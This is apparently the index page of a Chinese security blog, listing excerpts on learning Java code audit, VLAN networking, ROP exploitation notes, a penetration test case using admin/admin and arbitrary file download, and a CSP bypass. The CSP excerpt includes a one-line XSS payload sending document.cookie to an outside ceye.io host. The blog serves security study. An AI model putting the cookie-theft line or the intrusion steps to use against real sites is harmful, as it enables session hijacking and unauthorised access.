Fork me on GitHub
摘要: 一、前言 首先,本文不是技术文章,主要给出大家java代码审计学习方向的资料、资源推荐,如何从小白一点一点成长。因为最近好多人私信我,怎么去学java代码审计,这里尽量把小白刚入门存在的问题给解答出来,没有考虑到的,可以评论区讨论。这也算是我的成长之路吧。 二、初级 首先,对于没有代码审计经验的,可 阅读全文
posted @ 2020-06-18 10:14 Afant1 阅读(31705) 评论(10) 推荐(3) 编辑
该文被密码保护。 阅读全文
posted @ 2021-04-23 16:03 Afant1 阅读(0) 评论(0) 推荐(0) 编辑
摘要: 工作中,用到了网络知识,本科时候大部分都学过,刷b站复习一下,以下就是复习笔记。 二层隔离技术-MUX-VLAN 实现PC1,PC2,PC3,PC4可以和Server1访问,PC1和PC2可以互相访问,PC3和PC4不能相互访问,其中VLAN 30 主VLAN,VLAN 10为互通型从VLAN,VL 阅读全文
posted @ 2021-02-22 16:57 Afant1 阅读(658) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-08-09 11:27 Afant1 阅读(3) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-07-06 09:49 Afant1 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 看csp规则,默认是在当前域内,允许执行内联js。如果这是一道ctf的话,就很简单了, window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe 阅读全文
posted @ 2020-05-03 14:08 Afant1 阅读(1063) 评论(0) 推荐(0) 编辑
摘要: 案例是在最近项目中遇到的俩个站,挺有意思的,所以分享出来。第一个站getshell后,内网简单的看了下,发现不是目标就没深入。 第一个站 1、弱口令 弱口令:admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe 阅读全文
posted @ 2020-05-03 14:07 Afant1 阅读(1074) 评论(0) 推荐(0) 编辑
摘要: 当时不明白为什么要padding 8个a 原因: IDA查看当前的rsp是0x38 0x30=0x8,原因看上面 在vul函数ret地方下断点,rbp=0x1,r12=write_got地址,r13=0x1,r14=write_got地址,r15=0x8,执行add rsp,0x38= rsp就是0 阅读全文
posted @ 2020-04-17 18:14 Afant1 阅读(615) 评论(2) 推荐(0) 编辑
摘要: 今天并没有刷题,看到ctf wiki高级ROP,发现ret2_dl_runtime_resolve,涉及到PLT&GOT 表以及延迟绑定机制,还是把基础打好。 今天笔记不多,主要是理解。推荐一下看的资料 "PLT&GOT 表以及延迟绑定机制" "ELF 文件结构解析" "ELF文件结构解析的工具" 阅读全文
posted @ 2020-04-13 17:36 Afant1 阅读(1017) 评论(0) 推荐(0) 编辑
摘要: ROP x64位的,ret2csu: "http://www.vuln.cn/6644" "https://ctf wiki.github.io/ctf wiki/pwn/linux/stackoverflow/medium rop zh/ ret2reg" plt和got看这俩篇文章: "http 阅读全文
posted @ 2020-04-12 17:23 Afant1 阅读(412) 评论(0) 推荐(0) 编辑